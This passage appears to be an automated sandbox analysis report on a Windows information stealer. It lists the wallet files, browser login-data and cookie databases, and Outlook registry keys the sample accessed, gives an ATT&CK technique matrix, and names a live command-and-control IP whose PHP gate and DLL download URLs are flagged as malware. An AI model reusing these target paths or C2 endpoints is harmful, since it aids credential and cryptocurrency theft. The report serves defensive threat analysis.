              Source: file.exeString found in binary or memory: tream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1
              Source: file.exe, 00000000.00000002.2266753838.0000000001401000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\simple-storage.json
              Source: file.exeString found in binary or memory: tream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1
              Source: file.exeString found in binary or memory: ge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|
              Source: file.exeString found in binary or memory: \Coinomi\Coinomi\wallets\
              Source: file.exeString found in binary or memory: \Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiD
              Source: file.exeString found in binary or memory: ge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|
              Source: file.exeString found in binary or memory: \Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiD
              Source: file.exeString found in binary or memory: tream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1
              Source: file.exeString found in binary or memory: tream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1
              Source: file.exe, 00000000.00000002.2266753838.00000000013E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\*.*'
              Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-walJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journalJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-walJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\Jump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\Jump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\Jump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
              Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
              Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
              Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
              Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004Jump to behavior
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 5320, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 00000000.00000002.2266753838.000000000138E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 5320, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 5320, type: MEMORYSTR
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
              Native API
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              11
              Disable or Modify Tools
              2
              OS Credential Dumping
              2
              System Time Discovery
              Remote Services1
              Archive Collected Data
              12
              Ingress Tool Transfer
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts2
              Command and Scripting Interpreter
              Boot or Logon Initialization Scripts11
              Process Injection
              1
              Deobfuscate/Decode Files or Information
              LSASS Memory1
              Account Discovery
              Remote Desktop Protocol4
              Data from Local System
              2
              Encrypted Channel
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)4
              Obfuscated Files or Information
              Security Account Manager2
              File and Directory Discovery
              SMB/Windows Admin Shares1
              Email Collection
              2
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
              Software Packing
              NTDS345
              System Information Discovery
              Distributed Component Object ModelInput Capture112
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              DLL Side-Loading
              LSA Secrets651
              Security Software Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Masquerading
              Cached Domain Credentials33
              Virtualization/Sandbox Evasion
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items33
              Virtualization/Sandbox Evasion
              DCSync13
              Process Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
              Process Injection
              Proc Filesystem1
              System Owner/User Discovery
              Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              file.exe37%ReversingLabsWin32.Trojan.Generic
              file.exe100%AviraTR/Crypt.TPM.Gen
              file.exe100%Joe Sandbox ML
              SourceDetectionScannerLabelLink
              C:\ProgramData\freebl3.dll0%ReversingLabs
              C:\ProgramData\mozglue.dll0%ReversingLabs
              C:\ProgramData\msvcp140.dll0%ReversingLabs
              C:\ProgramData\nss3.dll0%ReversingLabs
              C:\ProgramData\softokn3.dll0%ReversingLabs
              C:\ProgramData\vcruntime140.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll0%ReversingLabs
              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll0%ReversingLabs
              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll0%ReversingLabs
              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll0%ReversingLabs
              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll0%ReversingLabs
              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll0%ReversingLabs
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
              https://duckduckgo.com/ac/?q=0%URL Reputationsafe
              https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.0%URL Reputationsafe
              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
              http://185.215.113.100/100%URL Reputationmalware
              http://185.215.113.100/e2b1563c6670f193.php100%URL Reputationmalware
              http://185.215.113.100100%URL Reputationmalware
              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
              http://www.sqlite.org/copyright.html.0%URL Reputationsafe
              https://mozilla.org0/0%URL Reputationsafe
              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
              https://www.ecosia.org/newtab/0%URL Reputationsafe
              https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta0%URL Reputationsafe
              https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%URL Reputationsafe
              https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
              https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg0%URL Reputationsafe
              https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg0%URL Reputationsafe
              https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL0%URL Reputationsafe
              https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref0%URL Reputationsafe
              http://185.215.113.100/e2b1563c6670f193.phpH;100%Avira URL Cloudmalware
              http://185.215.113.100/e2b1563c6670f193.php=Iq100%Avira URL Cloudmalware
              http://185.215.113.100/e2b1563c6670f193.phph100%Avira URL Cloudmalware
              http://185.215.113.100/e2b1563c6670f193.phpion:100%Avira URL Cloudmalware
              http://185.215.113.100/0d60be0de163924d/msvcp140.dllK100%Avira URL Cloudmalware
              http://185.215.113.100/e2b1563c6670f193.phpBrowser100%Avira URL Cloudmalware
              http://185.215.113.100/0d60be0de163924d/vcruntime140.dll100%Avira URL Cloudmalware
              http://185.215.113.100/e2b1563c6670f193.phpm100%Avira URL Cloudmalware
              http://185.215.113.100/e2b1563c6670f193.phpp100%Avira URL Cloudmalware
              https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi0%Avira URL Cloudsafe
              https://support.mozilla.org0%URL Reputationsafe
              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
              http://185.215.113.100/e2b1563c6670f193.phpf100%Avira URL Cloudmalware
              http://185.215.113.100/0d60be0de163924d/mozglue.dll100%Avira URL Cloudmalware
              http://185.215.113.100/e2b1563c6670f193.phpndI100%Avira URL Cloudmalware
              http://185.215.113.100Z0%Avira URL Cloudsafe
              http://www.mozilla.com/en-US/blocklist/0%Avira URL Cloudsafe
              http://185.215.113.100/0d60be0de163924d/softokn3.dll100%Avira URL Cloudmalware
              http://185.215.113.100/e2b1563c6670f193.php:100%Avira URL Cloudmalware
              http://185.215.113.100/0d60be0de163924d/sqlite3.dll100%Avira URL Cloudmalware
              http://185.215.113.100/0d60be0de163924d/nss3.dllc100%Avira URL Cloudmalware
              http://185.215.113.100/e2b1563c6670f193.php(100%Avira URL Cloudmalware
              http://185.215.113.100/0d60be0de163924d/freebl3.dll100%Avira URL Cloudmalware
              http://185.215.113.100e2b1563c6670f193.phpion:0%Avira URL Cloudsafe
              https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
              http://185.215.113.100/0d60be0de163924d/nss3.dll100%Avira URL Cloudmalware
              http://185.215.113.100/0d60be0de163924d/vcruntime140.dlll5100%Avira URL Cloudmalware
              http://185.215.113.100/e2b1563c6670f193.php0100%Avira URL Cloudmalware
              http://185.215.113.100/0d60be0de163924d/vcruntime140.dllN100%Avira URL Cloudmalware
              http://185.215.113.100/0d60be0de163924d/msvcp140.dll100%Avira URL Cloudmalware
              http://185.215.113.100/e2b1563c6670f193.php$100%Avira URL Cloudmalware
              http://185.215.113.100/e2b1563c6670f193.php3100%Avira URL Cloudmalware
              185.215.113.100/e2b1563c6670f193.php100%Avira URL Cloudmalware
              https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde74770%Avira URL Cloudsafe
              http://185.215.113.100/0d60be0de163924d/msvcp140.dll)100%Avira URL Cloudmalware
              http://185.215.113.100/e2b1563c6670f193.phpLo100%Avira URL Cloudmalware
              No contacted domains info
              NameMaliciousAntivirus DetectionReputation
              http://185.215.113.100/0d60be0de163924d/vcruntime140.dlltrue
              • Avira URL Cloud: malware
              unknown
              http://185.215.113.100/true
              • URL Reputation: malware
              unknown
              http://185.215.113.100/0d60be0de163924d/mozglue.dlltrue
              • Avira URL Cloud: malware
              unknown
              http://185.215.113.100/e2b1563c6670f193.phptrue
              • URL Reputation: malware
              unknown
              http://185.215.113.100/0d60be0de163924d/softokn3.dlltrue
              • Avira URL Cloud: malware
              unknown
              http://185.215.113.100/0d60be0de163924d/sqlite3.dlltrue
              • Avira URL Cloud: malware
              unknown
              http://185.215.113.100/0d60be0de163924d/freebl3.dlltrue
              • Avira URL Cloud: malware
              unknown
              http://185.215.113.100/0d60be0de163924d/nss3.dlltrue
              • Avira URL Cloud: malware
              unknown
              http://185.215.113.100/0d60be0de163924d/msvcp140.dlltrue
              • Avira URL Cloud: malware
              unknown
              185.215.113.100/e2b1563c6670f193.phptrue
              • Avira URL Cloud: malware
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              https://duckduckgo.com/chrome_newtabAKFIDHDG.0.drfalse
              • URL Reputation: safe
              unknown
              http://185.215.113.100/e2b1563c6670f193.phphfile.exe, 00000000.00000002.2266753838.0000000001401000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: malware
              unknown
              https://duckduckgo.com/ac/?q=file.exe, 00000000.00000002.2266753838.0000000001401000.00000004.00000020.00020000.00000000.sdmp, AKFIDHDG.0.drfalse
              • URL Reputation: safe
              unknown
              http://185.215.113.100/e2b1563c6670f193.phpion:file.exe, 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmptrue
              • Avira URL Cloud: malware
              unknown
              http://185.215.113.100/e2b1563c6670f193.phpmfile.exe, 00000000.00000002.2266753838.000000000138E000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: malware
              unknown
              http://185.215.113.100/e2b1563c6670f193.phpBrowserfile.exe, 00000000.00000002.2266753838.0000000001401000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: malware
              unknown
              http://185.215.113.100/e2b1563c6670f193.phpH;file.exe, 00000000.00000002.2266753838.0000000001380000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: malware
              unknown
              http://185.215.113.100/e2b1563c6670f193.phppfile.exe, 00000000.00000002.2266753838.0000000001401000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: malware
              unknown
              http://185.215.113.100/0d60be0de163924d/msvcp140.dllKfile.exe, 00000000.00000002.2266753838.00000000013E7000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: malware
              unknown
              http://185.215.113.100/e2b1563c6670f193.php=Iqfile.exe, 00000000.00000002.2266753838.0000000001380000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: malware
              unknown
              https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYiEGCFIDAFBFBAKFHJEGIJ.0.drfalse
              • Avira URL Cloud: safe
              unknown
              https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.file.exe, 00000000.00000002.2266753838.0000000001472000.00000004.00000020.00020000.00000000.sdmp, EGCFIDAFBFBAKFHJEGIJ.0.drfalse
              • URL Reputation: safe
              unknown
              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=file.exe, 00000000.00000002.2266753838.0000000001401000.00000004.00000020.00020000.00000000.sdmp, AKFIDHDG.0.drfalse
              • URL Reputation: safe
              unknown
              http://185.215.113.100/e2b1563c6670f193.phpffile.exe, 00000000.00000002.2266753838.0000000001380000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: malware
              unknown
              http://185.215.113.100/e2b1563c6670f193.phpndIfile.exe, 00000000.00000002.2266753838.0000000001380000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: malware
              unknown
              http://185.215.113.100file.exe, 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2266753838.000000000138E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmptrue
              • URL Reputation: malware
              unknown
              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfile.exe, 00000000.00000002.2266753838.0000000001401000.00000004.00000020.00020000.00000000.sdmp, AKFIDHDG.0.drfalse
              • URL Reputation: safe
              unknown
              http://185.215.113.100/e2b1563c6670f193.php:file.exe, 00000000.00000002.2266753838.0000000001380000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: malware
              unknown
              http://185.215.113.100Zfile.exe, 00000000.00000002.2266753838.000000000138E000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: safe
              unknown
              http://185.215.113.100/0d60be0de163924d/nss3.dllcfile.exe, 00000000.00000002.2266753838.00000000013E7000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: malware
              unknown
              http://www.sqlite.org/copyright.html.file.exe, 00000000.00000002.2294260699.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2278875167.000000001D88A000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://185.215.113.100/e2b1563c6670f193.php(file.exe, 00000000.00000002.2266753838.0000000001401000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: malware
              unknown
              http://www.mozilla.com/en-US/blocklist/file.exe, file.exe, 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.drfalse
              • Avira URL Cloud: safe
              unknown
              https://mozilla.org0/freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drfalse
              • URL Reputation: safe
              unknown
              https://www.google.com/images/branding/product/ico/googleg_lodp.icoAKFIDHDG.0.drfalse
              • Avira URL Cloud: safe
              unknown
              http://185.215.113.100/e2b1563c6670f193.php3file.exe, 00000000.00000002.2266753838.0000000001380000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: malware
              unknown
              http://185.215.113.100/e2b1563c6670f193.php0file.exe, 00000000.00000002.2266753838.0000000001401000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2266753838.0000000001380000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: malware
              unknown
              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=file.exe, 00000000.00000002.2266753838.0000000001401000.00000004.00000020.00020000.00000000.sdmp, AKFIDHDG.0.drfalse
              • URL Reputation: safe
              unknown
              https://www.ecosia.org/newtab/file.exe, 00000000.00000002.2266753838.0000000001401000.00000004.00000020.00020000.00000000.sdmp, AKFIDHDG.0.drfalse
              • URL Reputation: safe
              unknown
              http://185.215.113.100/0d60be0de163924d/vcruntime140.dllNfile.exe, 00000000.00000002.2284021788.0000000029A84000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: malware
              unknown
              https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&ctafile.exe, 00000000.00000002.2266753838.0000000001472000.00000004.00000020.00020000.00000000.sdmp, EGCFIDAFBFBAKFHJEGIJ.0.drfalse
              • URL Reputation: safe
              unknown
              https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brAFBAFBKEGCFBGCBFIDAKEHDAFC.0.drfalse
              • URL Reputation: safe
              unknown
              http://185.215.113.100/0d60be0de163924d/vcruntime140.dlll5file.exe, 00000000.00000002.2266753838.00000000013E7000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: malware
              unknown
              http://185.215.113.100/e2b1563c6670f193.php$file.exe, 00000000.00000002.2266753838.0000000001401000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: malware
              unknown
              http://185.215.113.100e2b1563c6670f193.phpion:file.exe, 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmptrue
              • Avira URL Cloud: safe
              unknown
              https://ac.ecosia.org/autocomplete?q=AKFIDHDG.0.drfalse
              • URL Reputation: safe
              unknown
              https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpgfile.exe, 00000000.00000002.2266753838.0000000001472000.00000004.00000020.00020000.00000000.sdmp, EGCFIDAFBFBAKFHJEGIJ.0.drfalse
              • URL Reputation: safe
              unknown
              https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgfile.exe, 00000000.00000002.2266753838.0000000001472000.00000004.00000020.00020000.00000000.sdmp, EGCFIDAFBFBAKFHJEGIJ.0.drfalse
              • URL Reputation: safe
              unknown
              https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBLAFBAFBKEGCFBGCBFIDAKEHDAFC.0.drfalse
              • URL Reputation: safe
              unknown
              https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&reffile.exe, 00000000.00000002.2266753838.0000000001472000.00000004.00000020.00020000.00000000.sdmp, EGCFIDAFBFBAKFHJEGIJ.0.drfalse
              • URL Reputation: safe
              unknown
              https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477file.exe, 00000000.00000002.2266753838.0000000001472000.00000004.00000020.00020000.00000000.sdmp, EGCFIDAFBFBAKFHJEGIJ.0.drfalse
              • Avira URL Cloud: safe
              unknown
              http://185.215.113.100/0d60be0de163924d/msvcp140.dll)file.exe, 00000000.00000002.2266753838.00000000013E7000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: malware
              unknown
              https://support.mozilla.orgAFBAFBKEGCFBGCBFIDAKEHDAFC.0.drfalse
              • URL Reputation: safe
              unknown
              http://185.215.113.100/e2b1563c6670f193.phpLofile.exe, 00000000.00000002.2266753838.0000000001380000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: malware
              unknown
              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=AKFIDHDG.0.drfalse
              • URL Reputation: safe
              unknown
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              185.215.113.100
              unknownPortugal
